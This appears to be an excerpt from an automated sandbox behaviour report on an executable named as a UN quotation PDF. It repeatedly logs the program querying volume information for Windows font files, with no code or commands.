Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
